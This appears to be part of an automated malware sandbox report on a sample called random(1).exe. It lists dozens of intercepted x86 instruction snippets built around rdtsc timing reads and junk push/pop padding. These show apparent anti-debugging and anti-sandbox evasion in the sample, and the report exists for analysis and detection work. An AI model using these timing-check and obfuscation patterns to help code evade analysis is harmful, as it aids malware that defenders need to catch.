              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1050C96 second address: 1050C9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053AF1 second address: 1053B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 call 00007F06D8B4D9CBh 0x0000000c sbb ecx, 225FCE12h 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 clc 0x00000017 mov ecx, dword ptr [ebp+122D2C1Bh] 0x0000001d popad 0x0000001e push 8C040BB4h 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053B1F second address: 1053B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053B23 second address: 1053B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053B27 second address: 1053B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 73FBF4CCh 0x0000000e mov edi, esi 0x00000010 push 00000003h 0x00000012 sub dh, FFFFFF8Fh 0x00000015 jng 00007F06D851854Bh 0x0000001b or dx, FDD8h 0x00000020 push 00000000h 0x00000022 mov dword ptr [ebp+122D3880h], eax 0x00000028 push 00000003h 0x0000002a jnl 00007F06D851854Bh 0x00000030 mov esi, 1AAF121Ch 0x00000035 push 84069BB0h 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jng 00007F06D8518546h 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053C15 second address: 1053C8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 76A3BBD7h 0x0000000e mov dx, si 0x00000011 push 00000003h 0x00000013 jmp 00007F06D8B4D9D6h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F06D8B4D9C8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push 00000003h 0x00000036 mov edi, 22C85492h 0x0000003b call 00007F06D8B4D9C9h 0x00000040 jmp 00007F06D8B4D9D1h 0x00000045 push eax 0x00000046 jbe 00007F06D8B4D9D4h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053C8C second address: 1053CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F06D8518546h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F06D8518546h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053CA4 second address: 1053CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053CAD second address: 1053CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053D7B second address: 1053D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053D7F second address: 1053D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053D85 second address: 1053DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dh, ah 0x0000000c mov dx, di 0x0000000f push 00000000h 0x00000011 jmp 00007F06D8B4D9CEh 0x00000016 call 00007F06D8B4D9C9h 0x0000001b pushad 0x0000001c js 00007F06D8B4D9C8h 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 jmp 00007F06D8B4D9CBh 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f jc 00007F06D8B4D9CAh 0x00000035 push ecx 0x00000036 push edx 0x00000037 pop edx 0x00000038 pop ecx 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d pushad 0x0000003e pushad 0x0000003f ja 00007F06D8B4D9C6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053DE5 second address: 1053DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1053DEF second address: 1053E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F06D8B4D9CCh 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 push esi 0x0000001a jng 00007F06D8B4D9C6h 0x00000020 pop esi 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107388F second address: 1073893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073893 second address: 1073897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073897 second address: 107389D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107389D second address: 1073904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D1h 0x00000008 jmp 00007F06D8B4D9CFh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F06D8B4D9CEh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push edi 0x00000019 jmp 00007F06D8B4D9D6h 0x0000001e pop edi 0x0000001f jmp 00007F06D8B4D9CEh 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073A66 second address: 1073A7A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F06D851854Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073A7A second address: 1073AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8B4D9D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073AAB second address: 1073AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073AAF second address: 1073AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073C06 second address: 1073C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073C0A second address: 1073C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073C13 second address: 1073C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073C1D second address: 1073C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073C22 second address: 1073C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073C28 second address: 1073C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073D8D second address: 1073D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073EBE second address: 1073ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F06D8B4D9C6h 0x0000000a jnl 00007F06D8B4D9C6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1073ECE second address: 1073ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1074191 second address: 1074197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1074197 second address: 10741B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F06D8518550h 0x0000000a push ecx 0x0000000b jnc 00007F06D8518546h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10746F4 second address: 107471B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F06D8B4D9D9h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F06D8B4D9C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107471B second address: 107471F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10749AC second address: 10749C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F06D8B4D9CBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10749C1 second address: 10749C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10749C5 second address: 10749C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 106B72F second address: 106B74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518559h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 106B74C second address: 106B77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F06D8B4D9CAh 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 jne 00007F06D8B4D9C6h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 103E5FE second address: 103E606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 103E606 second address: 103E60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 103E60C second address: 103E610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 103E610 second address: 103E62C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F06D8B4D9CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107503A second address: 1075044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1075044 second address: 107504A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107504A second address: 107504E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107578A second address: 107579D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107579D second address: 10757A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10757A1 second address: 10757A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107AED7 second address: 107AF03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8518553h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107AF03 second address: 107AF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107B2EE second address: 107B314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F06D8518550h 0x00000013 jmp 00007F06D851854Ah 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107B58B second address: 107B5B0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F06D8B4D9D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107B5B0 second address: 107B5D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F06D8518546h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107B5D6 second address: 107B5EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ecx 0x00000010 jo 00007F06D8B4D9CCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107F297 second address: 107F2A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnc 00007F06D8518546h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 107F2A4 second address: 107F2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F06D8B4D9CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1039674 second address: 1039689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F06D8518548h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 103CB3E second address: 103CB55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F06D8B4D9C6h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F06D8B4D9C6h 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108346E second address: 1083495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F06D8518557h 0x0000000d ja 00007F06D8518552h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10835F9 second address: 10835FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10835FF second address: 1083605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1083605 second address: 1083609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1083609 second address: 1083612 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1083612 second address: 108361E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1083774 second address: 108378D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518555h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084580 second address: 1084585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084585 second address: 108458A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084686 second address: 1084692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084692 second address: 1084696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084696 second address: 108469F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084C72 second address: 1084C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D22 second address: 1084D2C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D2C second address: 1084D45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F06D8518546h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F06D8518548h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D45 second address: 1084D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D4B second address: 1084D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1084D4F second address: 1084D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10851BC second address: 10851C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108524E second address: 1085253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085253 second address: 1085259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085259 second address: 10852B0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebx 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F06D8B4D9C8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 call 00007F06D8B4D9CBh 0x0000002e push eax 0x0000002f sub di, 1E4Ah 0x00000034 pop esi 0x00000035 pop esi 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F06D8B4D9D1h 0x0000003f push eax 0x00000040 pop eax 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10852B0 second address: 10852DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F06D8518555h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10852DC second address: 10852E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085511 second address: 1085515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085515 second address: 108551B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10856AF second address: 10856B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10856B5 second address: 10856BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1085803 second address: 108580D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 1086DAE second address: 1086DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
